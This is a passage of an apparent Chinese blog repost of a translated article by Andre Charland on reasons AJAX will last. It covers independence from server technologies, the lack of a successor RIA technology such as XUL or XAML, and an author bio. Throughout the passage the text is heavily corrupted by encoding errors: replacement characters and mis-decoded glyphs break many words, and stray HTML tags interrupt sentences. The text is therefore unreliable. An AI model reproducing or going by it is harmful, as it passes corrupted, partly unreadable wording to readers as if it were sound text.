喜欢也好�Q�厌恶也�|�。WEB2.0�q�行吸引了开发�h员、风险投资商、市场和最�l�用��L��所有的目光。这些明��的促进了AJAX的早期应用。当大肆的宣传过��M��后，我们��会看到什么呢�Q�从BackPack到google地图�Q�AJAX界面是WEB2.0应用的主要的�l�成。大量的宣传有助于加速采用AJAX�Q�而在可用性上的获益会使得该技术被�q�发应用。WEB2.0的一个主要原则是使用WEB作�ؓ一个应用开发的�q�_��Q�而不仅仅是一个网��c��高的可用性和交互能力的用��L��面是一切应用��^台的主要�l�成部分�?/p>
十大理由�W�九(ji��)名：AJAX��Z��服务器技术的不确定�?/b>

和AJAX技术的��览器的独立性相同，该技术也兼容所有的标准型的服务器和服务端语�a��Q�如PHP,ASP.ASP.Net,Perl,JSP,ColdFusion�{�等�Q�选择属于你的那种然后开始。这使得AJAX开发独立，因�ؓ所有的开发�h员都能��用�ƈ且一赯��论相同的表现层�?/p>
十大理由�W�十名：��Z��WEB的下一代RIA技术还没有出现

今天��׃��用XUL技术开发应用的人是伟大的，因�ؓ现在90%的浏览器�q�不支持�q�种技术，对于大多数的实际应用来说�Q��用这�U�技术不切合实际。然而，AJAX开发�h员应该给��Z��部分的注意力在这些技术，如XAML和XUL上。毫无疑问，�q�些技术将使开发富WEB应用变得��单。但是它们可能相互不兼容�q�且拥有不同的市场需求或动力�?/p>
在今后一�D�|��_��AJAX技术将极大的提高WEB应用的可用性。AJAX技术�ƈ不完��，不是“火��科学”许多的开发�h员和技术公司始�l�在��试RIA的其他更好的技术。而实际的问题是AJAX技术现在已�l�存在�ƈ且应用的很好�Q�它跨浏览器、跨�q�_��Q�而且不管是用戯��是开发�h员都喜欢它的作用。特征鲜明的AJAX应用如google地图已经成�ؓ了本领域的领��D��（�q�有��Z��用MapQuest吗？�Q�同��L��Q�领先的财富500��Z��用AJAX技术�ƈ且�A(ch��)献了开发工��L��C�֌�了。一般来��_��业内在��用AJAX技术上取得了一致�ƈ且正在��用它。再��一�ơ，RIA应用和WEB应用使用了AJAX获得的一个主要的优势不仅仅是开发�h员的一个工��P��而是一个现象：它改变了我们开发WEB应用的方式。没��说得清楚在RIA应用斚w��Q�哪一�U�技术会取代它，会在什么时候取代它�Q�但是很多因素都支持AJAX应用应该持箋好多�q��?/p>
关于作�?/b>

AndreCharland从事Internet软�g开始超�q�十�q�之久，他是eBusinessApplications(www.ebusinessapps.com)公司的主席和创徏者之一。他和DaveJohnson�?998�q�创��Z��该公司。他主要的经验在可用性、市场、项目管理和��Z��构�g的��Y件开发。所受教育包括：在Vancouver,BC的SimonFraserUniversity�Q�他在那里读计算机科学和工商��理。他作�ؓ开发者、管理者和架构师等不同�w�䆾有上百个Internet��目的经验�?/p>
原文链接http://www.developer.com/java/other/article.php/3567706

Jeff-Chen 2006-05-10 13:21 发表评论